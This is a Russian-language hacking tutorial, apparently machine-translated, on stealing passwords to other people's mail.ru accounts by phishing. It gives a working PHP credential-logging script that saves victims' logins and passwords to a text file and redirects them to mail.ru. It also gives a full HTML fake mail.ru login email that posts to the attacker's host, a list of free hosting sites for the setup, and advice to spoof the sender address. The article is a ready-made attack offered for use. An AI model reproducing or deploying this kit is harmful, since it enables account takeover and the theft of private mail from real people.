special

  1. HOME
  2. Хакерство и защита
  3. Взлом почты на mail.ru

This webpage has been robot translated, sorry for typos if any. To view the original content of the page, simply replace the translation subdomain with www in the address bar or use this link.

Взлом почты на mail.ru [СИ]

[::.INTRO.::]

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.

Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.

Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику, сами поймете.

Статья сгодится для новичков. Гуру просьба не читать :)

 

[::.PREPARATION.::]

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.

* Только заранее убедитесь что хостинг поддерживает PHP

Можно зарегистрироваться на любом из этих:

nextmail.ru 
hobby.ru 
webrise.ru 
lapin.ru 
free.dl-hosting.ru 
hostow.net 
beplaced.ru 
777host.ru 
paltus.ru 
miraclehost.ru 
freebox.ru 
alfaspace.net 
k70.ru 
hosting.promostudio.ru 
chat.ru 
maxhost.ru 
nixup.com 
e2e.ru 
noka.ru 
newmail.ru 
boom.ru 
h15.ru 
hut.ru 
jino-net.ru 
pochta.ru 
unlimhost.ru 
onepage.ru 
by.ru 
sbn.bz 
yard.ru 
domainhosting.ru 
orthodoxy.ru 
webservis.ru 
ru-web.net 
activehost.ru 
househost.ru 
bestof.ru 
addr.ru 
hosting.dump.ru 
pesni.ru 
medbox.ru 
fatal.ru 
x5x.ru 
hopshot.com 
5gigs.com 
wagoo.com 
orgfree.com 
awardspace.com 
bobos.ca 
www.host.sk 
zportal.info 
spaceall.de 
3x.ro 
sretenie.ru 
dotgeek.org 
sevhosting.net 
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru 
chat.ru 
boom.ru 
by.ru

Зарегистрировали? - идем дальше!

Что нам нужно?

Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл).


PHP Код:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранятьflock($f,2);fputs($f,$_GET['Login']."@"); #логинfputs($f,$_GET['Domain']); #доменfputs($f,";".$_GET['Password']."\n"); # парольflock($f,3);fclose($f);?><script>document.location.href="/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Рассмотрим скрипт поподробнее.


PHP Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.

  • Сохраним в файл mes.php и зальем на хостинг.
  • Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777.

Пожалуй с хостингом - все!

Приступим к самому письму, которое мы будем отправлять жертве на мыло.

 


Код Письма:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<brДля просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=class=login>
<form method="GET" action="http://адресссайта/mes.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td> 
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>
<tr> 
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div

Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.

[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.

 

Теперь остается отправить жертве письмо, желательно с подменой адреса.

Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.

Если жертва клюнет на это, значит вам повезло :)

Узнать пароли вы сможете в файлике mail.txt.

 

[::.END.::]

Думаю все.

А уж как подойти ко взлому решать вам.

Спасибо за внимание!

Жду ваших отзывов чуть ниже этого текста.

А лучше уж ничего и никого не ломать ;)

До свидания и до встречи :)

 


Дата створення/оновлення: 25.05.2018

';>